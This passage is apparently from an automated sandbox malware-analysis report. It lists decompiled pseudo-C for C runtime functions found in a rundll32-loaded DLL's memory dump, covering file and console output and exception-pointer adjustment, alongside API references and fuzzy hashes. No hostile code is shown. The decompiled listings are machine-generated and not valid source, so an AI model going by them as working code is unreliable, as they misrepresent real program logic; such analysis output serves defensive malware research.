								_v36 =  *(_t300 + _t273 + 0x2e) & 0x000000fb;
								_t227 =  *_t292;
								_v35 = _t227;
								 *((char*)(_t300 + _t273 + 0x2d)) = _t227;
								_push(2);
								_push( &_v36);
								L29:
								_push( &_v68);
								_t200 = E6ECE50E3(_t273, _t292);
								_t316 = _t315 + 0x10;
								__eflags = _t200 - 0xffffffff;
								if(_t200 != 0xffffffff) {
									_t201 = _v52;
									goto L31;
								}
							}
						} else {
							_t229 = _t267;
							_t279 = _t273 + 0x2e + _t300;
							while( *_t279 != _t267) {
								_t229 =  &(_t229->Internal);
								_t279 = _t279 + 1;
								if(_t229 < 5) {
									continue;
								}
								break;
							}
							_t302 = _v88 - _t292;
							_v48 = _t229;
							if(_t229 == 0) {
								_t73 = ( *_t292 & 0x000000ff) + 0x6ed1df50; // 0x0
								_t281 =  *_t73 + 1;
								_v80 = _t281;
								__eflags = _t281 - _t302;
								if(_t281 > _t302) {
									__eflags = _t302;
									if(_t302 <= 0) {
										goto L44;
									} else {
										_t309 = _v72;
										do {
											 *((char*)( *(0x6ed1e940 + _v84 * 4) + _t309 + _t267 + 0x2e)) =  *((intOrPtr*)(_t267 + _t292));
											_t267 =  &(_t267->Internal);
											__eflags = _t267 - _t302;
										} while (_t267 < _t302);
										goto L43;
									}
									L52:
								} else {
									_v132 = _t267;
									__eflags = _t281 - 4;
									_v128 = _t267;
									_v60 = _t292;
									_v48 = (_t281 == 4) + 1;
									_t238 = E6ECE73AF( &_v132,  &_v68,  &_v60, (_t281 == 4) + 1,  &_v132, _v64);
									_t316 = _t315 + 0x14;
									__eflags = _t238 - 0xffffffff;
									if(_t238 != 0xffffffff) {
										_t240 =  &(_v52[_v80]);
										__eflags = _t240;
										_t300 = _v72;
										goto L21;
									}
								}
							} else {
								_t285 = _v72;
								_t243 = _v80 + 0x2e + _t285;
								_v80 = _t243;
								_t246 =  *((char*)(( *_t243 & 0x000000ff) + 0x6ed1df50)) + 1;
								_v60 = _t246;
								_t247 = _t246 - _v48;
								_v76 = _t247;
								if(_t247 > _t302) {
									__eflags = _t302;
									if(_t302 > 0) {
										_t248 = _v52;
										_t310 = _v48;
										do {
											_t286 =  *((intOrPtr*)(_t267 + _t248));
											_t292 =  *(0x6ed1e940 + _v84 * 4) + _t285 + _t267;
											_t267 =  &(_t267->Internal);
											_t292[_t310 + 0x2e] = _t286;
											_t285 = _v72;
											__eflags = _t267 - _t302;
										} while (_t267 < _t302);
										L43:
										_t307 = _a4;
									}
									L44:
									 *((intOrPtr*)(_t307 + 4)) =  *((intOrPtr*)(_t307 + 4)) + _t302;
								} else {
									_t287 = _v48;
									_t303 = _t267;
									_t311 = _v80;
									do {
										 *((char*)(_t313 + _t303 - 0x18)) =  *_t311;
										_t303 =  &(_t303->Internal);
										_t311 = _t311 + 1;
									} while (_t303 < _t287);
									_t304 = _v76;
									if(_v76 > 0) {
										E6ECDD4D0( &_v28 + _t287, _t292, _t304);
										_t287 = _v48;
										_t315 = _t315 + 0xc;
									}
									_t300 = _v72;
									_t296 = _t267;
									_t312 = _v84;
									do {
										 *( *((intOrPtr*)(0x6ed1e940 + _t312 * 4)) + _t300 + _t296 + 0x2e) = _t267;
										_t296 =  &(_t296->Internal);
									} while (_t296 < _t287);
									_t307 = _a4;
									_v112 =  &_v28;
									_v124 = _t267;
									_v120 = _t267;
									_v48 = (_v60 == 4) + 1;
									_t258 = E6ECE73AF( &_v124,  &_v68,  &_v112, (_v60 == 4) + 1,  &_v124, _v64);
									_t316 = _t315 + 0x14;
									if(_t258 != 0xffffffff) {
										_t240 =  &(_v52[_v76]);
										L21:
										_t201 = _t240 - 1;
										L31:
										_v52 = _t201 + 1;
										_t205 = E6ECE4073(_v116, _t267,  &_v68, _v48,  &_v44, 5, _t267, _t267);
										_t315 = _t316 + 0x20;
										_v60 = _t205;
										if(_t205 != 0) {
											if(WriteFile(_v104,  &_v44, _t205,  &_v96, _t267) == 0) {
												L50:
												 *_t307 = GetLastError();
											} else {
												_t292 = _v52;
												_t210 =  *((intOrPtr*)(_t307 + 8)) + _t292 - _v100;
												_v76 = _t210;
												 *((intOrPtr*)(_t307 + 4)) = _t210;
												if(_v96 >= _v60) {
													if(_v53 != 0xa) {
														goto L38;
													} else {
														_t212 = 0xd;
														_v92 = _t212;
														if(WriteFile(_v104,  &_v92, 1,  &_v96, _t267) == 0) {
															goto L50;
														} else {
															if(_v96 >= 1) {
																 *((intOrPtr*)(_t307 + 8)) =  *((intOrPtr*)(_t307 + 8)) + 1;
																 *((intOrPtr*)(_t307 + 4)) =  *((intOrPtr*)(_t307 + 4)) + 1;
																_t292 = _v52;
																_v76 =  *((intOrPtr*)(_t307 + 4));
																goto L38;
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L51;
						L38:
					} while (_t292 < _v88);
				}
				L51:
				 *[fs:0x0] = _v16;
				_pop(_t299);
				_pop(_t308);
				_pop(_t266);
				return E6ECDC717(_t307, _t266, _v20 ^ _t313, _t292, _t299, _t308);
				goto L52;
			}

0x6ece674e
0x6ece6750
0x6ece675b
0x6ece675c
0x6ece675f
0x6ece6764
0x6ece6766
0x6ece676c
0x6ece6770
0x6ece6776
0x6ece677b
0x6ece6781
0x6ece6784
0x6ece6787
0x6ece678a
0x6ece678d
0x6ece6790
0x6ece679a
0x6ece67a1
0x6ece67a9
0x6ece67ac
0x6ece67b2
0x6ece67b6
0x6ece67b9
0x6ece67bd
0x6ece67bd
0x6ece67c5
0x6ece67cd
0x6ece67d2
0x6ece67d3
0x6ece67d4
0x6ece67d5
0x6ece67d8
0x6ece67da
0x6ece67e0
0x6ece67e6
0x6ece67e9
0x6ece67eb
0x6ece67ee
0x6ece67f7
0x6ece67fd
0x6ece6800
0x6ece6807
0x6ece680e
0x6ece6811
0x6ece694b
0x6ece694f
0x6ece6952
0x6ece6975
0x6ece697b
0x6ece697d
0x6ece6981
0x6ece69b2
0x6ece69b5
0x6ece69b7
0x00000000
0x6ece6983
0x6ece6983
0x6ece6986
0x6ece6989
0x6ece698c
0x6ece6ad6
0x6ece6ae4
0x6ece6aed
0x6ece6992
0x6ece699c
0x6ece69a1
0x6ece69a4
0x6ece69a7
0x6ece69ad
0x00000000
0x6ece69ad
0x6ece69a7
0x6ece698c
0x6ece6954
0x6ece695b
0x6ece695e
0x6ece6961
0x6ece6963
0x6ece6966
0x6ece696d
0x6ece696f
0x6ece69b8
0x6ece69bb
0x6ece69bc
0x6ece69c1
0x6ece69c4
0x6ece69c7
0x6ece69cd
0x00000000
0x6ece69cd
0x6ece69c7
0x6ece6817
0x6ece681a
0x6ece681c
0x6ece681e
0x6ece6822
0x6ece6823
0x6ece6827
0x00000000
0x00000000
0x00000000
0x6ece6827
0x6ece682c
0x6ece682e
0x6ece6833
0x6ece68f3
0x6ece68fa
0x6ece68fb
0x6ece68fe
0x6ece6900
0x6ece6ab0
0x6ece6ab2
0x00000000
0x6ece6ab4
0x6ece6ab4
0x6ece6ab7
0x6ece6ac6
0x6ece6aca
0x6ece6acb
0x6ece6acb
0x00000000
0x6ece6acf
0x00000000
0x6ece6906
0x6ece690b
0x6ece690e
0x6ece6911
0x6ece6917
0x6ece6920
0x6ece692b
0x6ece6930
0x6ece6933
0x6ece6936
0x6ece693f
0x6ece693f
0x6ece6942
0x00000000
0x6ece6942
0x6ece6936
0x6ece6839
0x6ece683c
0x6ece6842
0x6ece6844
0x6ece6851
0x6ece6852
0x6ece6855
0x6ece6858
0x6ece685d
0x6ece6a81
0x6ece6a83
0x6ece6a85
0x6ece6a88
0x6ece6a8b
0x6ece6a97
0x6ece6a9a
0x6ece6a9c
0x6ece6a9d
0x6ece6aa1
0x6ece6aa4
0x6ece6aa4
0x6ece6aa8
0x6ece6aa8
0x6ece6aa8
0x6ece6aab
0x6ece6aab
0x6ece6863
0x6ece6863
0x6ece6866
0x6ece6868
0x6ece686b
0x6ece686d
0x6ece6871
0x6ece6872
0x6ece6873
0x6ece6877
0x6ece687c
0x6ece6886
0x6ece688b
0x6ece688e
0x6ece688e
0x6ece6891
0x6ece6894
0x6ece6896
0x6ece6899
0x6ece68a2
0x6ece68a6
0x6ece68a7
0x6ece68ae
0x6ece68b4
0x6ece68bc
0x6ece68c7
0x6ece68cc
0x6ece68d7
0x6ece68dc
0x6ece68e2
0x6ece68eb
0x6ece6945
0x6ece6945
0x6ece69d0
0x6ece69d5
0x6ece69e7
0x6ece69ec
0x6ece69ef
0x6ece69f4
0x6ece6a0f
0x6ece6af2
0x6ece6af8
0x6ece6a15
0x6ece6a15
0x6ece6a20
0x6ece6a22
0x6ece6a25
0x6ece6a2e
0x6ece6a38
0x00000000
0x6ece6a3a
0x6ece6a3c
0x6ece6a3e
0x6ece6a57
0x00000000
0x6ece6a5d
0x6ece6a61
0x6ece6a67
0x6ece6a6a
0x6ece6a70
0x6ece6a73
0x00000000
0x6ece6a73
0x6ece6a61
0x6ece6a57
0x6ece6a38
0x6ece6a2e
0x6ece6a0f
0x6ece69f4
0x6ece68e2
0x6ece685d
0x6ece6833
0x00000000
0x6ece6a76
0x6ece6a76
0x6ece6a7f
0x6ece6afa
0x6ece6aff
0x6ece6b07
0x6ece6b08
0x6ece6b09
0x6ece6b15
0x00000000

APIs

GetConsoleOutputCP.KERNEL32(15BFF9F6,?,00000000,?), ref: 6ECE67AC

Part of subcall function 6ECE4073: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,6ECE61E2,?,00000000,-00000008), ref: 6ECE411F

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6ECE6A07
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6ECE6A4F
GetLastError.KERNEL32 ref: 6ECE6AF2

Memory Dump Source

Source File: 00000004.00000002.547037446.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000004.00000002.547034552.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547059831.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547078261.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.547082004.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.547085428.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ecc0000_rundll32.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 3df33aa991684aa5738fb39ce7dcc3d2529502c611a7fc4b81bef8c303c6c9c7
Instruction ID: e36a002f568be19a4444eead0784c62a56c1a98ac23457251669479d6d813db9
Opcode Fuzzy Hash: 3df33aa991684aa5738fb39ce7dcc3d2529502c611a7fc4b81bef8c303c6c9c7
Instruction Fuzzy Hash: 83D16A75D206599FDF01CFE8C8809EDBBB4FF49314F18852AE966AB641E730A852CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6ECDF49F, Relevance: 6.2, APIs: 4, Instructions: 168
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 64%

			E6ECDF49F(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t52;
				signed int _t53;
				intOrPtr _t54;
				signed int _t58;
				signed int _t61;
				intOrPtr _t71;
				signed int _t75;
				signed int _t79;
				signed int _t81;
				signed int _t84;
				signed int _t85;
				signed int _t97;
				signed int* _t98;
				signed char* _t101;
				signed int _t107;
				void* _t111;

				_push(0x10);
				_push(0x6ed1b140);
				E6ECDD350(__ebx, __edi, __esi);
				_t75 = 0;
				_t52 =  *(_t111 + 0x10);
				_t81 = _t52[1];
				if(_t81 == 0 ||  *((intOrPtr*)(_t81 + 8)) == 0) {
					L30:
					_t53 = 0;
					__eflags = 0;
					goto L31;
				} else {
					_t97 = _t52[2];
					if(_t97 != 0 ||  *_t52 < 0) {
						_t84 =  *_t52;
						_t107 =  *(_t111 + 0xc);
						if(_t84 >= 0) {
							_t107 = _t107 + 0xc + _t97;
						}
						 *(_t111 - 4) = _t75;
						_t101 =  *(_t111 + 0x14);
						if(_t84 >= 0 || ( *_t101 & 0x00000010) == 0) {
							L10:
							_t54 =  *((intOrPtr*)(_t111 + 8));
							__eflags = _t84 & 0x00000008;
							if((_t84 & 0x00000008) == 0) {
								__eflags =  *_t101 & 0x00000001;
								if(( *_t101 & 0x00000001) == 0) {
									_t84 =  *(_t54 + 0x18);
									__eflags = _t101[0x18] - _t75;
									if(_t101[0x18] != _t75) {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												__eflags =  *_t101 & 0x00000004;
												_t79 = 0;
												_t75 = (_t79 & 0xffffff00 | ( *_t101 & 0x00000004) != 0x00000000) + 1;
												__eflags = _t75;
												 *(_t111 - 0x20) = _t75;
												goto L29;
											}
										}
									} else {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												E6ECDD4D0(_t107, E6ECDF25D(_t84,  &(_t101[8])), _t101[0x14]);
												goto L29;
											}
										}
									}
								} else {
									__eflags =  *(_t54 + 0x18);
									if( *(_t54 + 0x18) == 0) {
										goto L32;
									} else {
										__eflags = _t107;
										if(_t107 == 0) {
											goto L32;
										} else {
											E6ECDD4D0(_t107,  *(_t54 + 0x18), _t101[0x14]);
											__eflags = _t101[0x14] - 4;
											if(_t101[0x14] == 4) {
												__eflags =  *_t107;
												if( *_t107 != 0) {
													_push( &(_t101[8]));
													_push( *_t107);
													goto L21;
												}
											}
											goto L29;
										}
									}
								}
							} else {
								_t84 =  *(_t54 + 0x18);
								goto L12;
							}
						} else {
							_t71 =  *0x6ed1e4e4; // 0x0
							 *((intOrPtr*)(_t111 - 0x1c)) = _t71;
							if(_t71 == 0) {
								goto L10;
							} else {
								 *0x6ecea154();
								_t84 =  *((intOrPtr*)(_t111 - 0x1c))();
								L12:
								if(_t84 == 0 || _t107 == 0) {
									L32:
									E6ECE1C23(_t75, _t84, _t97, _t101, _t107);
									asm("int3");
									_push(8);
									_push(0x6ed1b160);
									E6ECDD350(_t75, _t101, _t107);
									_t98 =  *(_t111 + 0x10);
									_t85 =  *(_t111 + 0xc);
									__eflags =  *_t98;
									if(__eflags >= 0) {
										_t103 = _t85 + 0xc + _t98[2];
										__eflags = _t85 + 0xc + _t98[2];
									} else {
										_t103 = _t85;
									}
									 *(_t111 - 4) =  *(_t111 - 4) & 0x00000000;
									_t108 =  *(_t111 + 0x14);
									_push( *(_t111 + 0x14));
									_push(_t98);
									_push(_t85);
									_t77 =  *((intOrPtr*)(_t111 + 8));
									_push( *((intOrPtr*)(_t111 + 8)));
									_t58 = E6ECDF49F(_t77, _t103, _t108, __eflags) - 1;
									__eflags = _t58;
									if(_t58 == 0) {
										_t61 = E6ECE019F(_t103, _t108[0x18], E6ECDF25D( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])));
									} else {
										_t61 = _t58 - 1;
										__eflags = _t61;
										if(_t61 == 0) {
											_t61 = E6ECE01AF(_t103, _t108[0x18], E6ECDF25D( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])), 1);
										}
									}
									 *(_t111 - 4) = 0xfffffffe;
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t61;
								} else {
									 *_t107 = _t84;
									_push( &(_t101[8]));
									_push(_t84);
									L21:
									 *_t107 = E6ECDF25D();
									L29:
									 *(_t111 - 4) = 0xfffffffe;
									_t53 = _t75;
									L31:
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t53;
								}
							}
						}
					} else {
						goto L30;
					}
				}
			}

0x6ecdf49f
0x6ecdf4a1
0x6ecdf4a6
0x6ecdf4ab
0x6ecdf4ad
0x6ecdf4b0
0x6ecdf4b5
0x6ecdf5c5
0x6ecdf5c5
0x6ecdf5c5
0x00000000
0x6ecdf4c4
0x6ecdf4c4
0x6ecdf4c9
0x6ecdf4d3
0x6ecdf4d5
0x6ecdf4da
0x6ecdf4df
0x6ecdf4df
0x6ecdf4e1
0x6ecdf4e4
0x6ecdf4e9
0x6ecdf50b
0x6ecdf50b
0x6ecdf50e
0x6ecdf511
0x6ecdf52f
0x6ecdf532
0x6ecdf571
0x6ecdf574
0x6ecdf577
0x6ecdf59c
0x6ecdf59e
0x00000000
0x6ecdf5a0
0x6ecdf5a0
0x6ecdf5a2
0x00000000
0x6ecdf5a4
0x6ecdf5a4
0x6ecdf5a9
0x6ecdf5ad
0x6ecdf5ad
0x6ecdf5ae
0x00000000
0x6ecdf5ae
0x6ecdf5a2
0x6ecdf579
0x6ecdf579
0x6ecdf57b
0x00000000
0x6ecdf57d
0x6ecdf57d
0x6ecdf57f
0x00000000
0x6ecdf581
0x6ecdf592
0x00000000
0x6ecdf597
0x6ecdf57f
0x6ecdf57b
0x6ecdf534
0x6ecdf534
0x6ecdf538
0x00000000
0x6ecdf53e
0x6ecdf53e
0x6ecdf540
0x00000000
0x6ecdf546
0x6ecdf54d
0x6ecdf555
0x6ecdf559
0x6ecdf55b
0x6ecdf55e
0x6ecdf563
0x6ecdf564
0x00000000
0x6ecdf564
0x6ecdf55e
0x00000000
0x6ecdf559
0x6ecdf540
0x6ecdf538
0x6ecdf513
0x6ecdf513
0x00000000
0x6ecdf513
0x6ecdf4f0
0x6ecdf4f0
0x6ecdf4f5
0x6ecdf4fa
0x00000000
0x6ecdf4fc
0x6ecdf4fe
0x6ecdf507
0x6ecdf516
0x6ecdf518
0x6ecdf5d7
0x6ecdf5d7
0x6ecdf5dc
0x6ecdf5dd
0x6ecdf5df
0x6ecdf5e4
0x6ecdf5e9
0x6ecdf5ec
0x6ecdf5ef
0x6ecdf5f2
0x6ecdf5fb
0x6ecdf5fb
0x6ecdf5f4
0x6ecdf5f4
0x6ecdf5f4
0x6ecdf5fe
0x6ecdf602
0x6ecdf605
0x6ecdf606
0x6ecdf607
0x6ecdf608
0x6ecdf60b
0x6ecdf614
0x6ecdf614
0x6ecdf617
0x6ecdf64d
0x6ecdf619
0x6ecdf619
0x6ecdf619
0x6ecdf61c
0x6ecdf633
0x6ecdf633
0x6ecdf61c
0x6ecdf652
0x6ecdf65c
0x6ecdf668
0x6ecdf526
0x6ecdf526
0x6ecdf52b
0x6ecdf52c
0x6ecdf566
0x6ecdf56d
0x6ecdf5b1
0x6ecdf5b1
0x6ecdf5b8
0x6ecdf5c7
0x6ecdf5ca
0x6ecdf5d6
0x6ecdf5d6
0x6ecdf518
0x6ecdf4fa
0x00000000
0x00000000
0x00000000
0x6ecdf4c9

APIs

___AdjustPointer.LIBCMT ref: 6ECDF566
___AdjustPointer.LIBCMT ref: 6ECDF589
___AdjustPointer.LIBCMT ref: 6ECDF625

Memory Dump Source

Source File: 00000004.00000002.547037446.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000004.00000002.547034552.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547059831.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547078261.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.547082004.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.547085428.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ecc0000_rundll32.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 78fbf0ed318755210473d8bf709bb8ec2763b9c655e01633b3cd131deb495923
Instruction ID: b63a3067d9ee32072dd2216a7903a3d14be520375a1431467eaa18c4d0bef836
Opcode Fuzzy Hash: 78fbf0ed318755210473d8bf709bb8ec2763b9c655e01633b3cd131deb495923
Instruction Fuzzy Hash: 2E51D172605683AFEB158F91E850BBA77A4FF04314F300529EE1587694FB33E849CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6ECE2D87, Relevance: 6.1, APIs: 4, Instructions: 82
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6ECE2D87(intOrPtr* _a4, intOrPtr _a8, void* _a12, intOrPtr _a16) {
				intOrPtr _t17;
				intOrPtr _t18;
				intOrPtr _t20;
				intOrPtr _t30;
				char _t32;
				intOrPtr _t40;
				intOrPtr* _t42;
				intOrPtr _t43;

				_t42 = _a4;
				if(_t42 != 0) {
					_t32 = 0;
					__eflags =  *_t42;
					if( *_t42 != 0) {
						_t17 = E6ECE4073(_a16, 0, _t42, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t17;
						if(_t17 != 0) {
							_t40 = _a8;
							__eflags = _t17 -  *((intOrPtr*)(_t40 + 0xc));
							if(__eflags <= 0) {
								L11:
								_t18 = E6ECE33C8(_a16, _t42,  *((intOrPtr*)(_t40 + 8)),  *((intOrPtr*)(_t40 + 0xc)));
								__eflags = _t18;
								if(_t18 != 0) {
									 *((intOrPtr*)(_t40 + 0x10)) = _t18 - 1;
									_t20 = 0;
									__eflags = 0;
								} else {
									E6ECE1F75(GetLastError());
									_t20 =  *((intOrPtr*)(E6ECE1FCF()));
								}
								L14:
								return _t20;
							}
							_t20 = E6ECE3445(_t40, __eflags, _t17);
							__eflags = _t20;
							if(_t20 != 0) {
								goto L14;
							}
							goto L11;
						}
						E6ECE1F75(GetLastError());
						return  *((intOrPtr*)(E6ECE1FCF()));
					}
					_t43 = _a8;
					__eflags =  *((intOrPtr*)(_t43 + 0xc));
					if(__eflags != 0) {
						L6:
						 *((char*)( *((intOrPtr*)(_t43 + 8)))) = _t32;
						L2:
						 *((intOrPtr*)(_t43 + 0x10)) = _t32;
						return 0;
					}
					_t30 = E6ECE3445(_t43, __eflags, 1);
					__eflags = _t30;
					if(_t30 != 0) {
						return _t30;
					}
					goto L6;
				}
				_t43 = _a8;
				E6ECE342B(_t43);
				_t32 = 0;
				 *((intOrPtr*)(_t43 + 8)) = 0;
				 *((intOrPtr*)(_t43 + 0xc)) = 0;
				goto L2;
			}

0x6ece2d8e
0x6ece2d93
0x6ece2db1
0x6ece2db3
0x6ece2db6
0x6ece2ddf
0x6ece2de7
0x6ece2de9
0x6ece2e02
0x6ece2e05
0x6ece2e08
0x6ece2e16
0x6ece2e23
0x6ece2e28
0x6ece2e2a
0x6ece2e43
0x6ece2e46
0x6ece2e46
0x6ece2e2c
0x6ece2e33
0x6ece2e3e
0x6ece2e3e
0x6ece2e48
0x00000000
0x6ece2e48
0x6ece2e0d
0x6ece2e12
0x6ece2e14
0x00000000
0x00000000
0x00000000
0x6ece2e14
0x6ece2df2
0x00000000
0x6ece2dfd
0x6ece2db8
0x6ece2dbb
0x6ece2dbe
0x6ece2dcd
0x6ece2dd0
0x6ece2da7
0x6ece2da7
0x00000000
0x6ece2daa
0x6ece2dc4
0x6ece2dc9
0x6ece2dcb
0x6ece2e4c
0x6ece2e4c
0x00000000
0x6ece2dcb
0x6ece2d95
0x6ece2d9a
0x6ece2d9f
0x6ece2da1
0x6ece2da4
0x00000000

APIs

Part of subcall function 6ECE4073: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,6ECE61E2,?,00000000,-00000008), ref: 6ECE411F

GetLastError.KERNEL32 ref: 6ECE2DEB
__dosmaperr.LIBCMT ref: 6ECE2DF2
GetLastError.KERNEL32(?,?,?,?), ref: 6ECE2E2C
__dosmaperr.LIBCMT ref: 6ECE2E33

Memory Dump Source

Source File: 00000004.00000002.547037446.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000004.00000002.547034552.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547059831.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547078261.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.547082004.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.547085428.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ecc0000_rundll32.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: 5707ec182c4fa29f9edf9a94eaa77e1f4e8f7d8b993a12eb1024fd7c8eb50fc0
Instruction ID: 1f0270f38b2d4aafe0ae2c99b44092d91d58301137940ce60eccabf80f4ee130
Opcode Fuzzy Hash: 5707ec182c4fa29f9edf9a94eaa77e1f4e8f7d8b993a12eb1024fd7c8eb50fc0
Instruction Fuzzy Hash: BC21D771604316AFDB559FEACC90A9BB7BDFF413657004929E91497A24F730EC508790

Uniqueness

Uniqueness Score: -1.00%

Function 6ECE7EA6, Relevance: 6.0, APIs: 4, Instructions: 29
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E6ECE7EA6(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0x6ed1e050, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E6ECE7E8F();
					E6ECE7E51();
					_t13 = WriteConsoleW( *0x6ed1e050, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}

0x6ece7ec3
0x6ece7ec7
0x6ece7ed4
0x6ece7ed9
0x6ece7ef4
0x6ece7ef4
0x6ece7efa

APIs

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,6ECE7857,?,00000001,?,?,?,6ECE6B46,?,?,00000000), ref: 6ECE7EBD
GetLastError.KERNEL32(?,6ECE7857,?,00000001,?,?,?,6ECE6B46,?,?,00000000,?,?,?,6ECE70CD,?), ref: 6ECE7EC9

Part of subcall function 6ECE7E8F: CloseHandle.KERNEL32(FFFFFFFE,6ECE7ED9,?,6ECE7857,?,00000001,?,?,?,6ECE6B46,?,?,00000000,?,?), ref: 6ECE7E9F

___initconout.LIBCMT ref: 6ECE7ED9

Part of subcall function 6ECE7E51: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6ECE7E80,6ECE7844,?,?,6ECE6B46,?,?,00000000,?), ref: 6ECE7E64

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,6ECE7857,?,00000001,?,?,?,6ECE6B46,?,?,00000000,?), ref: 6ECE7EEE

Memory Dump Source

Source File: 00000004.00000002.547037446.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000004.00000002.547034552.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547059831.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547078261.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.547082004.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.547085428.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ecc0000_rundll32.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 474ef8576a11256ba755c9f7207f7e336c1141b8b1f731fcf79eda6099011501
Instruction ID: dc2d12493e671d935b42ca1412dbbec50378a3f5283288db6d5a4e0d966d8e6b
Opcode Fuzzy Hash: 474ef8576a11256ba755c9f7207f7e336c1141b8b1f731fcf79eda6099011501
Instruction Fuzzy Hash: 66F0F236000618BFCF525FD1CC09A9E3F36EF8A3A0B044410FE2986964D7328C60AB90

Uniqueness

Uniqueness Score: -1.00%

Function 6ECDFAA0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 58%

			E6ECDFAA0(void* __ecx, void* __edx, signed char* _a4, signed char* _a8, intOrPtr _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				signed int _v36;
				void* _v40;
				intOrPtr _v44;
				signed int _v48;
				intOrPtr _v56;
				void _v60;
				signed char* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t74;
				void* _t75;
				char _t76;
				signed char _t78;
				signed int _t80;
				signed char* _t81;
				signed int _t82;
				signed int _t83;
				intOrPtr* _t87;
				void* _t90;
				signed char* _t93;
				intOrPtr* _t96;
				signed char _t97;
				intOrPtr _t98;
				intOrPtr _t99;
				intOrPtr* _t101;
				signed int _t102;
				signed int _t103;
				signed char _t108;
				signed char* _t111;
				signed int _t112;
				void* _t113;
				signed char* _t116;
				void* _t121;
				signed int _t123;
				void* _t130;
				void* _t131;

				_t110 = __edx;
				_t100 = __ecx;
				_t96 = _a4;
				if( *_t96 == 0x80000003) {
					return _t74;
				} else {
					_push(_t121);
					_push(_t113);
					_t75 = E6ECDF3B1(_t96, __ecx, __edx, _t113, _t121);
					if( *((intOrPtr*)(_t75 + 8)) != 0) {
						__imp__EncodePointer(0);
						_t121 = _t75;
						if( *((intOrPtr*)(E6ECDF3B1(_t96, __ecx, __edx, 0, _t121) + 8)) != _t121 &&  *_t96 != 0xe0434f4d &&  *_t96 != 0xe0434352) {
							_t87 = E6ECDEBF7(__edx, 0, _t121, _t96, _a8, _a12, _a16, _a20, _a28, _a32);
							_t130 = _t130 + 0x1c;
							if(_t87 != 0) {
								L16:
								return _t87;
							}
						}
					}
					_t76 = _a20;
					_v24 = _t76;
					_v20 = 0;
					if( *((intOrPtr*)(_t76 + 0xc)) > 0) {
						_push(_a28);
